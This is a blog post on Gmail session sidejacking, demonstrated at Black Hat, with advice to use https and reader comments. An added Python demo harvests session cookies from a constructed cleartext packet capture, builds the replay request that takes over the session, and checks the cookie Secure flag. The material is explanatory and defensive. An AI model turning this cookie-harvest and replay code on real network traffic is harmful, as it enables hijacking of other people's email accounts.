Protect Your Gmail Account From Hackers

At the recent Black Hat security conference, Robert Graham, CEO of Errata Security, demonstrated on camera how he hijacked a Gmail session and read the victim's email. He sniffed the Wi-Fi network for session cookies and loaded them into the browser on his notebook using Hamster, a tool he wrote himself. The attack needs neither the victim's username nor password: the attacker only has to be able to capture the victim's unencrypted traffic (for example on the same open Wi-Fi network) and pick the victim's IP address out of it.

This technique has been reported to work against almost any web application that identifies a logged-in user by a cookie. Other web-based email services such as Yahoo Mail and Hotmail are therefore vulnerable as well.

The good news is that the attack is easily prevented by using SSL (https), which encrypts the cookie along with everything else in transit, so a sniffer sees only ciphertext. However, Internet users reportedly seldom use it when reading their email, which leaves them at risk.
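To make the attack and the fix concrete, here is an added example (not code from the original post, and not Graham's Hamster) that does in a few lines what a sidejacking tool does: it walks over captured packets, pulls the Cookie header out of every cleartext HTTP request, and builds the replay request an attacker's browser would send. The capture is constructed inline: one plain-http webmail request with made-up cookie names and values, and one TLS record standing in for the same site used over https. The last function goes slightly beyond the post: it checks whether a given Set-Cookie header would still expose the cookie later, which is the mechanism behind "logged in over https, then redirected to http".

```python
"""Sidejacking demo: what a Wi-Fi sniffer sees, and why https stops it."""
import re
from http.cookies import SimpleCookie

# Constructed sample of two captured payloads as a sniffer on an open
# Wi-Fi network would see them. Host, cookie names and values are made up.
CAPTURE = [
    # 1. A plain-http webmail request: headers and session cookie readable.
    (b"GET /mail/?ui=1 HTTP/1.1\r\n"
     b"Host: mail.example.com\r\n"
     b"User-Agent: Mozilla/5.0\r\n"
     b"Cookie: SID=a1b2c3d4e5f6; GX=DQAAAJ8; TZ=480\r\n"
     b"\r\n"),
    # 2. The same site over https: a TLS application-data record, opaque bytes.
    b"\x17\x03\x01\x00\x40" + bytes(range(64)),
]

REQUEST_LINE = re.compile(rb"^([A-Z]+) (\S+) HTTP/1\.[01]$")


def parse_http_request(raw):
    """Return {'method', 'path', 'headers'} for a cleartext HTTP request,
    or None if the bytes are not readable HTTP (e.g. a TLS record)."""
    head, _, _body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    m = REQUEST_LINE.match(lines[0])
    if not m:
        return None
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(b":")
        if not sep:
            return None
        headers[name.strip().lower().decode("latin-1")] = value.strip().decode("latin-1")
    return {"method": m.group(1).decode(), "path": m.group(2).decode(), "headers": headers}


def harvest_cookies(capture):
    """Hamster-style pass over captured packets: collect every Cookie header
    seen in the clear, keyed by the Host it was sent to."""
    sessions = {}
    for raw in capture:
        req = parse_http_request(raw)
        if req is None or "cookie" not in req["headers"]:
            continue  # encrypted or cookie-less traffic yields nothing
        jar = SimpleCookie()
        jar.load(req["headers"]["cookie"])
        host = req["headers"].get("host", "?")
        sessions.setdefault(host, {}).update({k: v.value for k, v in jar.items()})
    return sessions


def build_replay(host, path, cookies):
    """The request an attacker's browser sends to take over the session:
    no username, no password, just the stolen cookie values."""
    cookie_hdr = "; ".join(f"{k}={v}" for k, v in cookies.items())
    return (f"GET {path} HTTP/1.1\r\nHost: {host}\r\n"
            f"Cookie: {cookie_hdr}\r\n\r\n").encode()


def cookie_exposed(set_cookie_header, scheme):
    """Whether a cookie set by this Set-Cookie header travels in cleartext.
    It is exposed if the page itself is served over http, or if the cookie
    lacks the Secure attribute: then a later http:// visit to the same host
    sends it in the clear even though the login happened over https."""
    jar = SimpleCookie()
    jar.load(set_cookie_header)
    morsel = next(iter(jar.values()))
    return scheme == "http" or not morsel["secure"]


if __name__ == "__main__":
    stolen = harvest_cookies(CAPTURE)
    print("sessions seen in the clear:", stolen)
    for host, cookies in stolen.items():
        print(build_replay(host, "/mail/", cookies).decode())
    print("https login, cookie without Secure:",
          cookie_exposed("SID=a1b2c3d4e5f6; Path=/", "https"))
    print("https login, cookie with Secure:   ",
          cookie_exposed("SID=a1b2c3d4e5f6; Path=/; Secure", "https"))
```

The TLS record produces nothing for the harvester, which is the whole point of the SSL advice: the cookie is still there, the sniffer just cannot read it. The `cookie_exposed` check shows why logging in over https is not enough on its own; once the site drops you back to http, a cookie without the Secure attribute goes out in the clear on the very next request.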

For example, going to http://mail.google.com takes you to an SSL page where you enter your username and password. After login, however, you are redirected to a non-SSL (http) page to read your email, so from then on your session cookie travels across the network in the clear, which is exactly what the attack exploits.

Accessing Gmail without using SSL

On the other hand, starting from https://mail.google.com (that address doesn't work for me, so I use https://mail.google.com/mail?tab=wm instead) makes Gmail keep you on an SSL page after login.

Accessing Gmail using SSL

Photos of the hacking demonstration are available. Remember to always use the SSL (https) version of a page whenever one is offered. Protect yourself online.


7 thoughts on “Protect Your Gmail Account From Hackers”

  1. mooiness says:

    I tried your method, which is to hit the HTTPS version of the main page, but it still goes back to non-HTTPS after I’ve logged in. I tried the extension that Azmeen recommended and it works a treat. :)

  2. TenthOfMarch says:

    @Azmeen
    Thanks for the info, Azmeen! :-) .

    @mooiness
    Hmmm… that is strange. I tried it in FF and IE. They both worked for me (as shown in the screenshot above).

    @Hasbullah Pit
    I think he was using http when he got hacked. If he had been using https, the chance of him being hacked would have been very slim.

  3. rrr says:

    Dear Sir,
    Someone regularly opens my Gmail account. How do I protect my account, and how can I find out who the culprit is?

  4. TenthOfMarch says:

    @rrr
    Wow, this is beyond my knowledge. You should first change your password to something more complex. Mix letters and numbers in it. And change all your “security questions”. Log in to Gmail using https://mail.google.com. That’s all I can help with. I have no idea how you can detect the person entering your account, though. All the best.

  5. Vaibhav Kanwal says:

    Hi! I think most of the hacking being done is not actual hacking but in fact social engineering or phishing. People fall prey and end up losing their usernames/passwords. This cannot be termed hacking. The only way is to educate people so they can guard themselves against social engineering, but when people are still using IE6, it’s a bit difficult to get this going.
